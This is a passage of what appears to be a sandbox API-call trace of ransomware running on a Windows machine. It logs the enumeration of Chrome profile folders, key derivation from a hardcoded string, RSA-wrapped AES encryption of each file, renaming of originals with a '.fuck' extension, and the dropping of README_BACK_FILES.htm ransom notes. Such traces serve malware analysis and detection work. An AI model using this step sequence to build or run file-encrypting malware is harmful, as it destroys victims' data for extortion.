[0247.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.095] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.095] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x380) returned 1 [0247.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x380, lpOverlapped=0x0) returned 1 [0247.096] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x0, lpOverlapped=0x0) returned 1 [0247.096] CryptEncrypt (in: hKey=0x2938778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x10) returned 1 [0247.096] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x10, lpOverlapped=0x0) returned 1 [0247.096] CloseHandle (hObject=0x5d40) returned 1 [0247.096] CloseHandle (hObject=0x5d4c) returned 1 [0247.097] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db"), bFailIfExists=0) returned 1 [0247.106] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db", dwFileAttributes=0x0) returned 1 [0247.107] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db.gsg")) returned 1 [0247.109] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\databases.db.fuck")) returned 1 [0247.110] CryptDestroyHash (hHash=0x2938a38) returned 1 [0247.110] CryptDestroyKey (hKey=0x2938778) returned 1 [0247.110] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.110] FindNextFileA (in: hFindFile=0x2938478, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.110] FindNextFileA (in: hFindFile=0x2938478, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0247.110] FindClose (in: hFindFile=0x2938478 | out: hFindFile=0x2938478) returned 1 [0247.110] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\readme_back_files.htm")) returned 0xffffffff [0247.110] AreFileApisANSI () returned 1 [0247.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 101 [0247.111] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\databases\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0247.111] GetFileType (hFile=0x5d48) returned 0x1 [0247.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0247.113] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.113] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x29389f8 [0247.126] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.126] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.127] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.127] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.127] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.127] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.127] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.127] GetLastError () returned 0x0 [0247.127] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old")) returned 0x20 [0247.127] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old", dwFileAttributes=0x80) returned 1 [0247.128] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.128] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.130] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old.gsg", dwFileAttributes=0x2) returned 1 [0247.131] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.134] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.134] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.134] CryptHashData (hHash=0x2938778, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.134] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x2938778, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29387b8) returned 1 [0247.134] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.134] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.134] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f5820) returned 1 [0247.135] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5820, dwCertEncodingType=0x1, pInfo=0x2935510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2935540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2935548*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x29384b8) returned 1 [0247.135] CryptEncrypt (in: hKey=0x29384b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.135] CryptEncrypt (in: hKey=0x29384b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f53e0*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f53e0*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.135] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f53e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f53e0*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.137] ReadFile (in: hFile=0x5d4c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x168, lpOverlapped=0x0) returned 1 [0247.138] CryptEncrypt (in: hKey=0x29387b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x168, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x170) returned 1 [0247.138] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x170, lpOverlapped=0x0) returned 1 [0247.138] CloseHandle (hObject=0x5d4c) returned 1 [0247.138] CloseHandle (hObject=0x5d40) returned 1 [0247.139] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old"), bFailIfExists=0) returned 1 [0247.153] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old", dwFileAttributes=0x0) returned 1 [0247.154] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old.gsg")) returned 1 [0247.155] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.old.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.old.fuck")) returned 1 [0247.156] CryptDestroyHash (hHash=0x2938778) returned 1 [0247.156] CryptDestroyKey (hKey=0x29387b8) returned 1 [0247.156] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.156] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.156] FindNextFileA (in: hFindFile=0x29389f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0247.156] FindClose (in: hFindFile=0x29389f8 | out: hFindFile=0x29389f8) returned 1 [0247.156] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\readme_back_files.htm")) returned 0xffffffff [0247.156] AreFileApisANSI () returned 1 [0247.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 120 [0247.156] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0247.159] GetFileType (hFile=0x5d48) returned 0x1 [0247.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x2b9c988*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c980, lpOverlapped=0x0 | out: lpBuffer=0x2b9c988*, lpNumberOfBytesWritten=0x2b9c980*=0x5ec, lpOverlapped=0x0) returned 1 [0247.161] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0247.161] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2938a38 [0247.175] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.175] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.176] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.176] GetLastError () returned 0x0 [0247.176] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log")) returned 0x20 [0247.177] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", dwFileAttributes=0x80) returned 1 [0247.177] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0247.177] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.178] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.gsg", dwFileAttributes=0x2) returned 1 [0247.179] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x28f6348) returned 1 [0247.181] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0247.181] lstrlenA (lpString="tFGxNkIfITmwdzAyUuZssuHDzMlQm") returned 29 [0247.181] CryptHashData (hHash=0x29385f8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.181] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x29385f8, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x29384f8) returned 1 [0247.181] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.181] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0247.181] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x28f5798) returned 1 [0247.182] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5798, dwCertEncodingType=0x1, pInfo=0x29356b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29356e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29356e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2938538) returned 1 [0247.182] CryptEncrypt (in: hKey=0x2938538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0247.182] CryptEncrypt (in: hKey=0x2938538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5f90*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x28f5f90*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0247.182] WriteFile (in: hFile=0x5d4c, lpBuffer=0x28f5f90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x28f5f90*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0247.183] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9cacc*=0x214, lpOverlapped=0x0) returned 1 [0247.184] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x214, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9cacc*=0x220) returned 1 [0247.184] WriteFile (in: hFile=0x5d4c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9cacc*=0x220, lpOverlapped=0x0) returned 1 [0247.186] CloseHandle (hObject=0x5d40) returned 1 [0247.186] CloseHandle (hObject=0x5d4c) returned 1 [0247.188] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), bFailIfExists=0) returned 1 [0247.192] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", dwFileAttributes=0x0) returned 1 [0247.192] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.gsg")) returned 1 [0247.194] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.fuck")) returned 1 [0247.216] CryptDestroyHash (hHash=0x29385f8) returned 1 [0247.217] CryptDestroyKey (hKey=0x29384f8) returned 1 [0247.217] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0247.217] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.217] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.217] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.217] FindNextFileA (in: hFindFile=0x2938a38, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0247.217] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0247.219] GetLastError () returned 0x0 [0247.220] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old")) returned 0x20 [0247.220] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old", dwFileAttributes=0x80) returned 1 [0247.220] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0247.221] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.old.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.old.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 